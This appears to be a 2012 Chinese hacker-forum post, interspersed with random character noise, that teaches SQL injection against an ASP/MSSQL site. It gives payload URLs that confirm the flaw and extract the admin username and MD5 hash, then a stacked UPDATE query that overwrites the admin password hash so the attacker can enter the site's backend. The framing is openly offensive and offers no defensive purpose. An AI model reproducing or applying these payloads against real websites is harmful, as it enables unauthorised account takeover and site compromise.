经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。. U# k( t ~5 d, [+ t
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
7 Q+ f1 H: X. d( A0 f测试如下:& q v1 B+ p: c. F. i3 Q
http://www.tmdsb.com/news.asp?id=121
1 X" y: q. q, I- z- L4 Q在地址后输入单引号,显示" F( e# R- P# K) O3 X' r3 T
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’/ p$ n$ F; G2 O3 Y) [, [: {# r' x
字符串 ’’’ 之前有未闭合的引号, \3 {: s$ i8 C3 ]! ~
/news/tmdws.asp,行636 x8 E6 J9 q" z/ @8 K8 Z% ] m/ i+ a
说明没有过滤单引号且数据库是MSSQL.. n6 J) @6 T' y( |- B. [- [$ M# V$ {
and 1=1正常。and 1=2出错。肯定存在注入& ^- O1 k u& _# o I$ U
接着输入
* g9 s% ?0 k0 f( [7 m6 R- q$ \http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)* S2 u; S/ g' X8 @* x! E
得到帐号为:admin5 k- g+ F, e* l" q! {
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
+ y5 l2 V$ Z! S& {得到密码为:a4716077c2ba075c9 C G( Z/ W9 r0 a5 x6 p7 K
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
; z* O1 [4 I. I+ T1 P; I) L命令如下 :+ y2 |7 W$ @- O; i: }
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
; _4 |) x$ k8 U6 V- r% @这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41